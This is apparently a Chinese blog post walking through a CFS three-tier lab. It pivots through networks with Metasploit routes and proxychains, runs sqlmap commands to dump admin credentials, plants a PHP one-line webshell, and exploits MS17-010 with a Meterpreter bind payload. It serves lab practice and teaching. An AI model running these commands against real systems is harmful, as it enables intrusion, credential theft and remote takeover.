CFS靶机三层(3)

通过ifconfig信息收集,得知还有另外一张网卡

img

先用*msf自带的探测网络接口的模块(get_local_subnets)**查看路由的模块(autoroute -p)*来进一步进行信息探测

img

*通过**设置路由的方式把我们的请求从centos发出,这样不就可以在kali上访问到centos的ip了吗*,所以我们要来添加一个路由*(autoroute -s)*,因为我们已经在75的网段内,所以添加的路由肯定添加22网段的,

img

Msf代理配置

img

再进入 */etc/proxychains4.conf* 更改代理配置即可

在该文件的最下面一行,把ip更改为kali攻击机的ip,端口更改为刚刚配置模块的端口,更改后如下:

img

注意:这里使用nmap扫描要禁用ping检测,即-Pn,因为不一定能ping通)

直接扫是这样的

img

加上-Pn

img

可以看到ubuntu开放了80端口,我们挂上代理去访问

我这里用switchyomega这个插件

img

img

img

就可以访问了,我们其实在主机上面不配置都可以访问,因为是主机模式,但是我们模拟的是真实环境,就是需要配置代理才能访问

访问之后发现是个八哥cms3.1版本

打开源码可以看到提示是sql注入

img

用sqlmap直接跑

1.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 --dbs

2.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D bagecms --tables

3.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D begacms -T bage_admin --columns

4.sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.132:2222 -D begacms -T bage_admin -C username,password –dump

最终得到账号密码

img

拿去解密cmd5.com

img

得到账号密码之后就是爆破后台地址

img

扫到了个

img

img

就是第二个然后访问的时候去掉最后的星号

/index.php?r=admini

img

img

登录后观察网站,发现使用了很多模块化文件。而且都是php格式,我们直接在其中的一个php文件中加入一句话木马,再访问该文件位置,注意这里的网址使用的是模块化,不能直接加在网站上,要用?r=模块文件 的方式访问模块文件,再用蚁剑连接,注意,因为这里只是靶场,用的都是虚拟机的仅主机模式,所以蚁剑可以直接连接,平时正常情况下是不行的,需要给蚁剑配置kali一样的代理,这里是靶场就不需要了

img

img

收集信息

img

有另外一张网卡

生成正向木马

img

同样的msf新开一个页面开启监听,但是这里要注意,msf新开一个页面后之前的那个页面的所有东西都用不了,所以不能直接msfconsole打开,msf这里也需要走代理 ,就是再用proxychains msfconsole命令来启动msf,再设置payload,设置lport,设置rhost,即可开启监听

img

img

查看网络接口

img

发现还有33的

查看路由

img

老三样,先添加路由

img

这里我们已经处于target_2的网络下,可以直接调用模块扫描33网段

use auxiliary/scanner/portscan/tcp

show options

set RHOSTS 192.168.33.0/24

exploit

img

上传fscan ,

Chmod +x fscan

./fscanc –h 192.168.33.0/24 –o 1.txt

Cat 1.txt

img

可以看到192.168.33.33有永恒之蓝漏洞

调用ms17-010模块攻击

use exploit/windows/smb/ms17_010_psexec

set payload windows/x64/meterpreter/bind_tcp //设置正向连接

show options //设置 set RHOST 192.168.33.33

exploit

成功拿下第三层windows靶机

img

img

posted @ 2024-12-11 17:10  CLLWA  阅读(8)  评论(0编辑  收藏  举报